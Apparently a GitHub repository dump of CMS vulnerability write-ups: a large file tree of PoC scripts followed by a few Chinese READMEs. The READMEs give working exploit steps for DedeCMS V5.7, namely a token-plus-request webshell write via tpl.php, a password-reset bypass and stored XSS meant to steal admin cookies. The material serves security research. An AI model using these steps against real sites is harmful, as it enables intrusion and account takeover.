├── .gitignore ├── DedeCMS ├── DedeCMS V5.7 SP2后台存在代码执行漏洞 │ └── README.md ├── DedeCMS_V5.7_ │ ├── dedecms_environment.png │ ├── readme.md │ ├── response.png │ └── resullt.png ├── DedeCMS_v5.7_carbuyaction_存储型XSS │ ├── README.md │ ├── add_good.png │ ├── add_shopcar.png │ ├── back_xssed.png │ ├── edit_address.png │ └── xssed.png ├── DedeCMS_v5.7_shops_delivery_存储型XSS │ ├── README.md │ ├── add_delivery.png │ ├── front_xssed.png │ └── show_delivery.png └── DedeCMS_v5.7_友情链接CSRF_GetShell │ ├── README.md │ ├── apply.png │ ├── click_res.png │ ├── edit.png │ ├── link_list.png │ └── shell.png ├── Discuz ├── Discuz! 1.5-2.5 命令执行漏洞 │ └── readme.md └── Discuz_<3.4_birthprovince_前台任意文件删除 │ ├── 1.PNG │ ├── README.md │ └── changed.PNG ├── Drupal └── Drupal远程代码执行漏洞(CVE-2017-6920) │ ├── 1.png │ ├── 2.png │ ├── README.md │ └── poc.txt ├── Ecshop └── ecshop2.x_code_execute │ └── readme.md ├── FineCMS └── FineCMS最新版5.0.8两处getshell │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── README.md │ ├── finecms-5.0.8-getshell.py │ └── finecms-5.0.8-getshell2.py ├── Joomla ├── Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869) │ ├── README.md │ ├── poc.png │ ├── poc.py │ └── poc_res.png └── Joomla_3.7.0_SQL注入(CVE-2017-8917) │ ├── README.md │ ├── poc.png │ └── poc.py ├── LICENSE ├── Metinfo ├── MetInfo V5.1.7 │ └── README.md └── Metinfo6.0.0 │ └── methifo6.0.0.md ├── PHPCMS ├── PHPCMS_v9.6.0_SQL注入 │ ├── README.md │ ├── poc.png │ └── poc.py ├── PHPCMS_v9.6.0_任意文件上传 │ ├── README.md │ ├── caidao1.png │ ├── caidao2.png │ ├── poc.png │ ├── poc.py │ └── shell.txt ├── PHPCMS_v9.6.1_任意文件下载 │ ├── README.md │ ├── poc.png │ └── poc.py └── PHPCMS_v9.6.2_任意文件下载 │ ├── README.md │ ├── poc.png │ └── poc.py ├── README.md ├── Struts └── S2-048(CVE-2017-9791) │ ├── README.md │ ├── burp-poc.png │ ├── burp-poc.txt │ ├── firefox-poc.png │ ├── firefox-post.txt │ ├── poc.py │ └── py-poc.png ├── ThinkPHP ├── ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷 │ ├── README.md │ ├── poc1.png │ ├── poc2.png │ └── tp3.2.3 │ │ ├── .htaccess │ │ ├── Application │ │ ├── Common │ │ │ ├── Common │ │ │ │ └── index.html │ │ │ ├── Conf │ │ │ │ ├── config.php │ │ │ │ └── index.html │ │ │ └── index.html │ │ ├── Home │ │ │ ├── Common │ │ │ │ └── index.html │ │ │ ├── Conf │ │ │ │ ├── config.php │ │ │ │ └── index.html │ │ │ ├── Controller │ │ │ │ ├── IndexController.class.php │ │ │ │ └── index.html │ │ │ ├── Model │ │ │ │ └── index.html │ │ │ ├── View │ │ │ │ └── index.html │ │ │ └── index.html │ │ ├── README.md │ │ ├── Runtime │ │ │ ├── Cache │ │ │ │ ├── Home │ │ │ │ │ ├── 20914c0f075f91df3579ffbdf5180b02.php │ │ │ │ │ ├── index.html │ │ │ │ │ └── p.php │ │ │ │ └── index.html │ │ │ ├── Data │ │ │ │ └── index.html │ │ │ ├── Logs │ │ │ │ ├── Common │ │ │ │ │ └── 18_01_13.log │ │ │ │ ├── Home │ │ │ │ │ ├── 18_01_13.log │ │ │ │ │ └── index.html │ │ │ │ └── index.html │ │ │ ├── Temp │ │ │ │ ├── b068931cc450442b63f5b3d276ea4297.php │ │ │ │ └── index.html │ │ │ └── index.html │ │ └── index.html │ │ ├── Public │ │ └── README.md │ │ ├── README.md │ │ ├── ThinkPHP │ │ ├── Common │ │ │ └── functions.php │ │ ├── Conf │ │ │ ├── convention.php │ │ │ └── debug.php │ │ ├── LICENSE.txt │ │ ├── Lang │ │ │ ├── en-us.php │ │ │ ├── pt-br.php │ │ │ ├── zh-cn.php │ │ │ └── zh-tw.php │ │ ├── Library │ │ │ ├── Behavior │ │ │ │ ├── AgentCheckBehavior.class.php │ │ │ │ ├── BorisBehavior.class.php │ │ │ │ ├── BrowserCheckBehavior.class.php │ │ │ │ ├── BuildLiteBehavior.class.php │ │ │ │ ├── CheckActionRouteBehavior.class.php │ │ │ │ ├── CheckLangBehavior.class.php │ │ │ │ ├── ChromeShowPageTraceBehavior.class.php │ │ │ │ ├── ContentReplaceBehavior.class.php │ │ │ │ ├── CronRunBehavior.class.php │ │ │ │ ├── FireShowPageTraceBehavior.class.php │ │ │ │ ├── ParseTemplateBehavior.class.php │ │ │ │ ├── ReadHtmlCacheBehavior.class.php │ │ │ │ ├── RobotCheckBehavior.class.php │ │ │ │ ├── ShowPageTraceBehavior.class.php │ │ │ │ ├── ShowRuntimeBehavior.class.php │ │ │ │ ├── TokenBuildBehavior.class.php │ │ │ │ ├── UpgradeNoticeBehavior.class.php │ │ │ │ └── WriteHtmlCacheBehavior.class.php │ │ │ ├── Org │ │ │ │ ├── Net │ │ │ │ │ ├── Http.class.php │ │ │ │ │ └── IpLocation.class.php │ │ │ │ └── Util │ │ │ │ │ ├── ArrayList.class.php │ │ │ │ │ ├── CodeSwitch.class.php │ │ │ │ │ ├── Date.class.php │ │ │ │ │ ├── Rbac.class.php │ │ │ │ │ ├── Stack.class.php │ │ │ │ │ └── String.class.php │ │ │ ├── Think │ │ │ │ ├── App.class.php │ │ │ │ ├── Auth.class.php │ │ │ │ ├── Behavior.class.php │ │ │ │ ├── Build.class.php │ │ │ │ ├── Cache.class.php │ │ │ │ ├── Cache │ │ │ │ │ └── Driver │ │ │ │ │ │ ├── Apachenote.class.php │ │ │ │ │ │ ├── Apc.class.php │ │ │ │ │ │ ├── Db.class.php │ │ │ │ │ │ ├── Eaccelerator.class.php │ │ │ │ │ │ ├── File.class.php │ │ │ │ │ │ ├── Memcache.class.php │ │ │ │ │ │ ├── Memcached.class.php │ │ │ │ │ │ ├── Memcachesae.class.php │ │ │ │ │ │ ├── Redis.class.php │ │ │ │ │ │ ├── Shmop.class.php │ │ │ │ │ │ ├── Sqlite.class.php │ │ │ │ │ │ ├── Wincache.class.php │ │ │ │ │ │ └── Xcache.class.php │ │ │ │ ├── Controller.class.php │ │ │ │ ├── Controller │ │ │ │ │ ├── HproseController.class.php │ │ │ │ │ ├── JsonRpcController.class.php │ │ │ │ │ ├── RestController.class.php │ │ │ │ │ ├── RpcController.class.php │ │ │ │ │ └── YarController.class.php │ │ │ │ ├── Crypt.class.php │ │ │ │ ├── Crypt │ │ │ │ │ └── Driver │ │ │ │ │ │ ├── Base64.class.php │ │ │ │ │ │ ├── Crypt.class.php │ │ │ │ │ │ ├── Des.class.php │ │ │ │ │ │ ├── Think.class.php │ │ │ │ │ │ └── Xxtea.class.php │ │ │ │ ├── Db.class.php │ │ │ │ ├── Db │ │ │ │ │ ├── Driver.class.php │ │ │ │ │ ├── Driver │ │ │ │ │ │ ├── Firebird.class.php │ │ │ │ │ │ ├── Mongo.class.php │ │ │ │ │ │ ├── Mysql.class.php │ │ │ │ │ │ ├── Oracle.class.php │ │ │ │ │ │ ├── Pgsql.class.php │ │ │ │ │ │ ├── Sqlite.class.php │ │ │ │ │ │ └── Sqlsrv.class.php │ │ │ │ │ └── Lite.class.php │ │ │ │ ├── Dispatcher.class.php │ │ │ │ ├── Exception.class.php │ │ │ │ ├── Hook.class.php │ │ │ │ ├── Image.class.php │ │ │ │ ├── Image │ │ │ │ │ └── Driver │ │ │ │ │ │ ├── GIF.class.php │ │ │ │ │ │ ├── Gd.class.php │ │ │ │ │ │ └── Imagick.class.php │ │ │ │ ├── Log.class.php │ │ │ │ ├── Log │ │ │ │ │ └── Driver │ │ │ │ │ │ ├── File.class.php │ │ │ │ │ │ └── Sae.class.php │ │ │ │ ├── Model.class.php │ │ │ │ ├── Model │ │ │ │ │ ├── AdvModel.class.php │ │ │ │ │ ├── MergeModel.class.php │ │ │ │ │ ├── MongoModel.class.php │ │ │ │ │ ├── RelationModel.class.php │ │ │ │ │ └── ViewModel.class.php │ │ │ │ ├── Page.class.php │ │ │ │ ├── Route.class.php │ │ │ │ ├── Session │ │ │ │ │ └── Driver │ │ │ │ │ │ ├── Db.class.php │ │ │ │ │ │ ├── Memcache.class.php │ │ │ │ │ │ └── Mysqli.class.php │ │ │ │ ├── Storage.class.php │ │ │ │ ├── Storage │ │ │ │ │ └── Driver │ │ │ │ │ │ ├── File.class.php │ │ │ │ │ │ └── Sae.class.php │ │ │ │ ├── Template.class.php │ │ │ │ ├── Template │ │ │ │ │ ├── Driver │ │ │ │ │ │ ├── Ease.class.php │ │ │ │ │ │ ├── Lite.class.php │ │ │ │ │ │ ├── Mobile.class.php │ │ │ │ │ │ ├── Smart.class.php │ │ │ │ │ │ └── Smarty.class.php │ │ │ │ │ ├── TagLib.class.php │ │ │ │ │ └── TagLib │ │ │ │ │ │ ├── Cx.class.php │ │ │ │ │ │ └── Html.class.php │ │ │ │ ├── Think.class.php │ │ │ │ ├── Upload.class.php │ │ │ │ ├── Upload │ │ │ │ │ └── Driver │ │ │ │ │ │ ├── Bcs.class.php │ │ │ │ │ │ ├── Bcs │ │ │ │ │ │ ├── bcs.class.php │ │ │ │ │ │ ├── mimetypes.class.php │ │ │ │ │ │ └── requestcore.class.php │ │ │ │ │ │ ├── Ftp.class.php │ │ │ │ │ │ ├── Local.class.php │ │ │ │ │ │ ├── Qiniu.class.php │ │ │ │ │ │ ├── Qiniu │ │ │ │ │ │ └── QiniuStorage.class.php │ │ │ │ │ │ ├── Sae.class.php │ │ │ │ │ │ └── Upyun.class.php │ │ │ │ ├── Verify.class.php │ │ │ │ ├── Verify │ │ │ │ │ ├── bgs │ │ │ │ │ │ ├── 1.jpg │ │ │ │ │ │ ├── 2.jpg │ │ │ │ │ │ ├── 3.jpg │ │ │ │ │ │ ├── 4.jpg │ │ │ │ │ │ ├── 5.jpg │ │ │ │ │ │ ├── 6.jpg │ │ │ │ │ │ ├── 7.jpg │ │ │ │ │ │ └── 8.jpg │ │ │ │ │ └── ttfs │ │ │ │ │ │ ├── 1.ttf │ │ │ │ │ │ ├── 2.ttf │ │ │ │ │ │ ├── 3.ttf │ │ │ │ │ │ ├── 4.ttf │ │ │ │ │ │ ├── 5.ttf │ │ │ │ │ │ └── 6.ttf │ │ │ │ └── View.class.php │ │ │ └── Vendor │ │ │ │ ├── Boris │ │ │ │ ├── Boris.php │ │ │ │ ├── CLIOptionsHandler.php │ │ │ │ ├── ColoredInspector.php │ │ │ │ ├── Config.php │ │ │ │ ├── DumpInspector.php │ │ │ │ ├── EvalWorker.php │ │ │ │ ├── ExportInspector.php │ │ │ │ ├── Inspector.php │ │ │ │ ├── ReadlineClient.php │ │ │ │ └── ShallowParser.php │ │ │ │ ├── EaseTemplate │ │ │ │ ├── template.core.php │ │ │ │ └── template.ease.php │ │ │ │ ├── Hprose │ │ │ │ ├── HproseClassManager.php │ │ │ │ ├── HproseClient.php │ │ │ │ ├── HproseCommon.php │ │ │ │ ├── HproseFormatter.php │ │ │ │ ├── HproseHttpClient.php │ │ │ │ ├── HproseHttpServer.php │ │ │ │ ├── HproseIO.php │ │ │ │ ├── HproseIOStream.php │ │ │ │ ├── HproseReader.php │ │ │ │ ├── HproseTags.php │ │ │ │ └── HproseWriter.php │ │ │ │ ├── README.txt │ │ │ │ ├── SmartTemplate │ │ │ │ ├── class.smarttemplate.php │ │ │ │ ├── class.smarttemplatedebugger.php │ │ │ │ └── class.smarttemplateparser.php │ │ │ │ ├── Smarty │ │ │ │ ├── Smarty.class.php │ │ │ │ ├── SmartyBC.class.php │ │ │ │ ├── debug.tpl │ │ │ │ ├── plugins │ │ │ │ │ ├── block.textformat.php │ │ │ │ │ ├── function.counter.php │ │ │ │ │ ├── function.cycle.php │ │ │ │ │ ├── function.fetch.php │ │ │ │ │ ├── function.html_checkboxes.php │ │ │ │ │ ├── function.html_image.php │ │ │ │ │ ├── function.html_options.php │ │ │ │ │ ├── function.html_radios.php │ │ │ │ │ ├── function.html_select_date.php │ │ │ │ │ ├── function.html_select_time.php │ │ │ │ │ ├── function.html_table.php │ │ │ │ │ ├── function.mailto.php │ │ │ │ │ ├── function.math.php │ │ │ │ │ ├── modifier.capitalize.php │ │ │ │ │ ├── modifier.date_format.php │ │ │ │ │ ├── modifier.debug_print_var.php │ │ │ │ │ ├── modifier.escape.php │ │ │ │ │ ├── modifier.regex_replace.php │ │ │ │ │ ├── modifier.replace.php │ │ │ │ │ ├── modifier.spacify.php │ │ │ │ │ ├── modifier.truncate.php │ │ │ │ │ ├── modifiercompiler.cat.php │ │ │ │ │ ├── modifiercompiler.count_characters.php │ │ │ │ │ ├── modifiercompiler.count_paragraphs.php │ │ │ │ │ ├── modifiercompiler.count_sentences.php │ │ │ │ │ ├── modifiercompiler.count_words.php │ │ │ │ │ ├── modifiercompiler.default.php │ │ │ │ │ ├── modifiercompiler.escape.php │ │ │ │ │ ├── modifiercompiler.from_charset.php │ │ │ │ │ ├── modifiercompiler.indent.php │ │ │ │ │ ├── modifiercompiler.lower.php │ │ │ │ │ ├── modifiercompiler.noprint.php │ │ │ │ │ ├── modifiercompiler.string_format.php │ │ │ │ │ ├── modifiercompiler.strip.php │ │ │ │ │ ├── modifiercompiler.strip_tags.php │ │ │ │ │ ├── modifiercompiler.to_charset.php │ │ │ │ │ ├── modifiercompiler.unescape.php │ │ │ │ │ ├── modifiercompiler.upper.php │ │ │ │ │ ├── modifiercompiler.wordwrap.php │ │ │ │ │ ├── outputfilter.trimwhitespace.php │ │ │ │ │ ├── shared.escape_special_chars.php │ │ │ │ │ ├── shared.literal_compiler_param.php │ │ │ │ │ ├── shared.make_timestamp.php │ │ │ │ │ ├── shared.mb_str_replace.php │ │ │ │ │ ├── shared.mb_unicode.php │ │ │ │ │ ├── shared.mb_wordwrap.php │ │ │ │ │ └── variablefilter.htmlspecialchars.php │ │ │ │ └── sysplugins │ │ │ │ │ ├── smarty_cacheresource.php │ │ │ │ │ ├── smarty_cacheresource_custom.php │ │ │ │ │ ├── smarty_cacheresource_keyvaluestore.php │ │ │ │ │ ├── smarty_config_source.php │ │ │ │ │ ├── smarty_internal_cacheresource_file.php │ │ │ │ │ ├── smarty_internal_compile_append.php │ │ │ │ │ ├── smarty_internal_compile_assign.php │ │ │ │ │ ├── smarty_internal_compile_block.php │ │ │ │ │ ├── smarty_internal_compile_break.php │ │ │ │ │ ├── smarty_internal_compile_call.php │ │ │ │ │ ├── smarty_internal_compile_capture.php │ │ │ │ │ ├── smarty_internal_compile_config_load.php │ │ │ │ │ ├── smarty_internal_compile_continue.php │ │ │ │ │ ├── smarty_internal_compile_debug.php │ │ │ │ │ ├── smarty_internal_compile_eval.php │ │ │ │ │ ├── smarty_internal_compile_extends.php │ │ │ │ │ ├── smarty_internal_compile_for.php │ │ │ │ │ ├── smarty_internal_compile_foreach.php │ │ │ │ │ ├── smarty_internal_compile_function.php │ │ │ │ │ ├── smarty_internal_compile_if.php │ │ │ │ │ ├── smarty_internal_compile_include.php │ │ │ │ │ ├── smarty_internal_compile_include_php.php │ │ │ │ │ ├── smarty_internal_compile_insert.php │ │ │ │ │ ├── smarty_internal_compile_ldelim.php │ │ │ │ │ ├── smarty_internal_compile_nocache.php │ │ │ │ │ ├── smarty_internal_compile_private_block_plugin.php │ │ │ │ │ ├── smarty_internal_compile_private_function_plugin.php │ │ │ │ │ ├── smarty_internal_compile_private_modifier.php │ │ │ │ │ ├── smarty_internal_compile_private_object_block_function.php │ │ │ │ │ ├── smarty_internal_compile_private_object_function.php │ │ │ │ │ ├── smarty_internal_compile_private_print_expression.php │ │ │ │ │ ├── smarty_internal_compile_private_registered_block.php │ │ │ │ │ ├── smarty_internal_compile_private_registered_function.php │ │ │ │ │ ├── smarty_internal_compile_private_special_variable.php │ │ │ │ │ ├── smarty_internal_compile_rdelim.php │ │ │ │ │ ├── smarty_internal_compile_section.php │ │ │ │ │ ├── smarty_internal_compile_setfilter.php │ │ │ │ │ ├── smarty_internal_compile_while.php │ │ │ │ │ ├── smarty_internal_compilebase.php │ │ │ │ │ ├── smarty_internal_config.php │ │ │ │ │ ├── smarty_internal_config_file_compiler.php │ │ │ │ │ ├── smarty_internal_configfilelexer.php │ │ │ │ │ ├── smarty_internal_configfileparser.php │ │ │ │ │ ├── smarty_internal_data.php │ │ │ │ │ ├── smarty_internal_debug.php │ │ │ │ │ ├── smarty_internal_filter_handler.php │ │ │ │ │ ├── smarty_internal_function_call_handler.php │ │ │ │ │ ├── smarty_internal_get_include_path.php │ │ │ │ │ ├── smarty_internal_nocache_insert.php │ │ │ │ │ ├── smarty_internal_parsetree.php │ │ │ │ │ ├── smarty_internal_resource_eval.php │ │ │ │ │ ├── smarty_internal_resource_extends.php │ │ │ │ │ ├── smarty_internal_resource_file.php │ │ │ │ │ ├── smarty_internal_resource_php.php │ │ │ │ │ ├── smarty_internal_resource_registered.php │ │ │ │ │ ├── smarty_internal_resource_stream.php │ │ │ │ │ ├── smarty_internal_resource_string.php │ │ │ │ │ ├── smarty_internal_smartytemplatecompiler.php │ │ │ │ │ ├── smarty_internal_template.php │ │ │ │ │ ├── smarty_internal_templatebase.php │ │ │ │ │ ├── smarty_internal_templatecompilerbase.php │ │ │ │ │ ├── smarty_internal_templatelexer.php │ │ │ │ │ ├── smarty_internal_templateparser.php │ │ │ │ │ ├── smarty_internal_utility.php │ │ │ │ │ ├── smarty_internal_write_file.php │ │ │ │ │ ├── smarty_resource.php │ │ │ │ │ ├── smarty_resource_custom.php │ │ │ │ │ ├── smarty_resource_recompiled.php │ │ │ │ │ ├── smarty_resource_uncompiled.php │ │ │ │ │ └── smarty_security.php │ │ │ │ ├── TemplateLite │ │ │ │ ├── class.compiler.php │ │ │ │ ├── class.config.php │ │ │ │ ├── class.template.php │ │ │ │ └── internal │ │ │ │ │ ├── compile.compile_config.php │ │ │ │ │ ├── compile.compile_custom_block.php │ │ │ │ │ ├── compile.compile_custom_function.php │ │ │ │ │ ├── compile.compile_if.php │ │ │ │ │ ├── compile.generate_compiler_debug_output.php │ │ │ │ │ ├── compile.include.php │ │ │ │ │ ├── compile.parse_is_expr.php │ │ │ │ │ ├── compile.section_start.php │ │ │ │ │ ├── debug.tpl │ │ │ │ │ ├── template.build_dir.php │ │ │ │ │ ├── template.config_loader.php │ │ │ │ │ ├── template.destroy_dir.php │ │ │ │ │ ├── template.fetch_compile_include.php │ │ │ │ │ └── template.generate_debug_output.php │ │ │ │ ├── jsonRPC │ │ │ │ ├── jsonRPCClient.php │ │ │ │ └── jsonRPCServer.php │ │ │ │ ├── phpRPC │ │ │ │ ├── bigint.php │ │ │ │ ├── compat.php │ │ │ │ ├── dhparams.php │ │ │ │ ├── dhparams │ │ │ │ │ ├── 1024.dhp │ │ │ │ │ ├── 128.dhp │ │ │ │ │ ├── 1536.dhp │ │ │ │ │ ├── 160.dhp │ │ │ │ │ ├── 192.dhp │ │ │ │ │ ├── 2048.dhp │ │ │ │ │ ├── 256.dhp │ │ │ │ │ ├── 3072.dhp │ │ │ │ │ ├── 4096.dhp │ │ │ │ │ ├── 512.dhp │ │ │ │ │ ├── 768.dhp │ │ │ │ │ └── 96.dhp │ │ │ │ ├── pecl │ │ │ │ │ └── xxtea │ │ │ │ │ │ ├── CREDITS │ │ │ │ │ │ ├── INSTALL │ │ │ │ │ │ ├── LICENSE │ │ │ │ │ │ ├── README │ │ │ │ │ │ ├── config.m4 │ │ │ │ │ │ ├── config.w32 │ │ │ │ │ │ ├── php_xxtea.c │ │ │ │ │ │ ├── php_xxtea.dsp │ │ │ │ │ │ ├── php_xxtea.h │ │ │ │ │ │ ├── php_xxtea.sln │ │ │ │ │ │ ├── php_xxtea.vcproj │ │ │ │ │ │ ├── test │ │ │ │ │ │ └── test.php │ │ │ │ │ │ ├── xxtea.c │ │ │ │ │ │ └── xxtea.h │ │ │ │ ├── phprpc_client.php │ │ │ │ ├── phprpc_date.php │ │ │ │ ├── phprpc_server.php │ │ │ │ └── xxtea.php │ │ │ │ └── spyc │ │ │ │ ├── COPYING │ │ │ │ ├── README.md │ │ │ │ ├── Spyc.php │ │ │ │ ├── composer.json │ │ │ │ ├── examples │ │ │ │ ├── yaml-dump.php │ │ │ │ └── yaml-load.php │ │ │ │ ├── php4 │ │ │ │ ├── 5to4.php │ │ │ │ ├── spyc.php4 │ │ │ │ └── test.php4 │ │ │ │ ├── spyc.yaml │ │ │ │ └── tests │ │ │ │ ├── DumpTest.php │ │ │ │ ├── IndentTest.php │ │ │ │ ├── ParseTest.php │ │ │ │ ├── RoundTripTest.php │ │ │ │ ├── comments.yaml │ │ │ │ ├── failing1.yaml │ │ │ │ ├── indent_1.yaml │ │ │ │ └── quotes.yaml │ │ ├── Mode │ │ │ ├── Api │ │ │ │ ├── App.class.php │ │ │ │ ├── Controller.class.php │ │ │ │ ├── Dispatcher.class.php │ │ │ │ └── functions.php │ │ │ ├── Lite │ │ │ │ ├── App.class.php │ │ │ │ ├── Controller.class.php │ │ │ │ ├── Dispatcher.class.php │ │ │ │ ├── Model.class.php │ │ │ │ ├── View.class.php │ │ │ │ ├── convention.php │ │ │ │ └── functions.php │ │ │ ├── Sae │ │ │ │ └── convention.php │ │ │ ├── api.php │ │ │ ├── common.php │ │ │ ├── lite.php │ │ │ └── sae.php │ │ ├── ThinkPHP.php │ │ ├── Tpl │ │ │ ├── dispatch_jump.tpl │ │ │ ├── page_trace.tpl │ │ │ └── think_exception.tpl │ │ └── logo.png │ │ ├── composer.json │ │ └── index.php └── ThinkPHP_5.X_远程代码执行漏洞 │ ├── POC.png │ ├── Thinkphp_check.py │ ├── readme.md │ ├── run_Thinkphp_check.png │ └── thinkphp_5.0.22_with_extend │ ├── .gitignore │ ├── .travis.yml │ ├── LICENSE.txt │ ├── README.md │ ├── application │ ├── .htaccess │ ├── command.php │ ├── common.php │ ├── config.php │ ├── database.php │ ├── extra │ │ └── queue.php │ ├── index │ │ └── controller │ │ │ └── Index.php │ ├── route.php │ └── tags.php │ ├── build.php │ ├── composer.json │ ├── extend │ └── .gitignore │ ├── public │ ├── .htaccess │ ├── favicon.ico │ ├── index.php │ ├── robots.txt │ ├── router.php │ └── static │ │ └── .gitignore │ ├── runtime │ └── .gitignore │ ├── think │ └── vendor │ └── .gitignore ├── ThinkSNS └── ThinkSNS_V4 │ └── README.md ├── WebLogic ├── CVE-2017-3506 & CVE-2017-10271 │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── README.md │ └── WebLogic-XMLDecoder.jar ├── CVE-2018-2628 │ ├── README.md │ ├── bypassing.png │ ├── poc.py │ └── testing.png └── CVE-2018-2893 │ ├── README.md │ ├── weblogic.py │ └── ysoserial-cve-2018-2893.jar ├── WordPress ├── WordPress_4.4_SSRF │ ├── README.md │ ├── dnslog.png │ ├── poc.png │ └── poc.py ├── WordPress_4.7.0-4.7.1_未授权内容注入 │ ├── README.md │ ├── poc.png │ └── poc.py ├── WordPress_4.7_Info_Disclosure │ ├── README.md │ ├── poc.png │ └── poc.py └── Wordpress _= 4.9.6 任意文件删除漏洞 │ └── Wordpress _= 4.9.6 任意文件删除漏洞.md └── seacms ├── SeaCMS v6.45前台Getshell 代码执行 └── readme.md ├── seacms 6.55 代码执行 └── seacms6.55.md ├── seacms6.54代码执行 └── seacms6.54.md └── seacms6.61 ├── seacms.md └── seacms661.md /.gitignore: -------------------------------------------------------------------------------- 1 | */local/* 2 | *.local 3 | -------------------------------------------------------------------------------- /DedeCMS/DedeCMS V5.7 SP2后台存在代码执行漏洞/README.md: -------------------------------------------------------------------------------- 1 | ## [DedeCMS V5.7 SP2后台存在代码执行漏洞](http://www.freebuf.com/vuls/164035.html) 2 | 3 | 4 | [下载](http://www.dedecms.com/products/dedecms/downloads/) 5 | 6 | ## Affected Version 7 | 8 | DedeCMS V5.7 SP2 9 | 10 | ## Code analysis 11 | 12 | #### 漏洞详情 13 | 14 | 默认后台地址 `/dede/`,文件`dede/tpl.php`中的251到281行。 15 | 16 | 17 | csrf_check(); 18 | #filename和前面正则的匹配情况 19 | if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)) 20 | { 21 | ShowMsg('文件名不合法,不允许进行操作!', '-1'); 22 | exit(); 23 | } 24 | require_once(DEDEINC.'/oxwindow.class.php'); 25 | #搜索filename中匹配`\.lib\.php$#i`的部分,以空格代替 26 | $tagname = preg_replace("#\.lib\.php$#i", "", $filename); 27 | #去掉反斜号 28 | $content = stripslashes($content); 29 | #拼接文件名 30 | $truefile = DEDEINC.'/taglib/'.$filename; 31 | #写入内容 32 | $fp = fopen($truefile, 'w'); 33 | fwrite($fp, $content); 34 | fclose($fp); 35 | 36 | replace处理之后赋值给变量 $tagname 。但是写入文件的时候并没有用到$tagname 。 37 | 那为什么有这个$tagname,拼接文件名的时候,应该是拼接`tagname` 38 | 39 | 利用 40 | 41 | 1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。 42 | 43 | 2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。 44 | 45 | 3.这里还有一个csrf_check()函数,即请求中必须要带token参数。 46 | 47 | 48 | #### 漏洞利用 49 | 50 | 1. 首先获取`token`。访问域名 + `/dede/tpl.php?action=upload` 51 | 52 | view-source:http://127.0.0.1:8000/DedeCMS/uploads/dede/tpl.php?action=upload 53 | 54 | d170f6bed3360da62d909d28a072c312 55 | 56 | 57 | 58 | ![](http://opmi2ydgh.bkt.clouddn.com//18-3-8/56295937.jpg) 59 | 60 | 2.然后访问 61 | 62 | 域名 + /dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值 63 | 64 | 65 | 66 | ![](http://opmi2ydgh.bkt.clouddn.com//18-3-8/16267803.jpg) 67 | 68 | shell 地址 69 | 70 | 域名 + /include/taglib/secnote.lib.php 71 | 72 | ![](http://opmi2ydgh.bkt.clouddn.com//18-3-8/81830140.jpg) 73 | 74 | 75 | ## References 76 | 77 | [DedeCMS V5.7 SP2后台存在代码执行漏洞](http://www.freebuf.com/vuls/164035.html) -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_V5.7_/dedecms_environment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_V5.7_/dedecms_environment.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_V5.7_/readme.md: -------------------------------------------------------------------------------- 1 | DedeCMS_V5.7_前台用户密码修改 2 | 3 | 测试环境: 4 | 5 | DedeCMS-V5.7-UTF8-SP2--正式版(2018-01-09 6 | 7 | ![environment](https://github.com/rerestst/CMS-Hunter/blob/master/DedeCMS/DedeCMS_V5.7_/dedecms_environment.png) 8 | 9 | 启动了会员功能,针对注册时未设置找回问题的用户。 10 | 11 | POC: 12 | 1.GET /dede/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=1 13 | 14 | ![environment](https://github.com/rerestst/CMS-Hunter/blob/master/DedeCMS/DedeCMS_V5.7_/response.png) 15 | 16 | 2.GET /dede/member/resetpassword.php?dopost=getpasswd&id=1&key=b9495tc8 17 | 18 | ![environment](https://github.com/rerestst/CMS-Hunter/blob/master/DedeCMS/DedeCMS_V5.7_/resullt.png) 19 | -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_V5.7_/response.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_V5.7_/response.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_V5.7_/resullt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/DedeCMS/DedeCMS_V5.7_/resullt.png -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/README.md: -------------------------------------------------------------------------------- 1 | # DedeCMS_v5.7_carbuyaction_存储型XSS 2 | 3 | ## Affected Version 4 | 5 | DedeCMS-V5.7-UTF8-SP2 ( 发布日期 2017-03-15 ) 6 | 7 | 需要站点启用商城功能。 8 | 9 | 下载地址: 链接: https://pan.baidu.com/s/1bprjPx1 密码: mwdq 10 | 11 | 12 | ## PoC 13 | 14 | 该漏洞 通过用户在编写订单收货地址的相关参数 注入 XSS Payload,导致 前台查看订单的页面和后台管理员查看订单详情的页面都会被 XSS。 15 | 16 | 所以说,可以用来打管理员 Cookie 。 17 | 18 | 测试: 19 | 20 | 1. 首先管理员添加一项商城的商品 21 | 22 | ![](add_good.png) 23 | 24 | 2. 前台用户选定商品添加购物车 25 | 26 | ![](add_shopcar.png) 27 | 28 | 3. 前台用户编辑订单的收货地址,在这里 address,des,email,postname 都是存在 XSS 的,插入 XSS Payload 29 | 30 | ![](edit_address.png) 31 | 32 | 4. 查看订单详情发现前台已经被 XSS 33 | 34 | ![](xssed.png) 35 | 36 | 5. 管理员进入后台查看商城订单同样也会被 XSS :p 37 | 38 | ![](back_xssed.png) 39 | 40 | ## References 41 | 42 | 1. https://www.seebug.org/vuldb/ssvid-92855 43 | -------------------------------------------------------------------------------- /DedeCMS/DedeCMS_v5.7_carbuyaction_存储型XSS/add_good.png: -------------------------------------------------------------------------------- 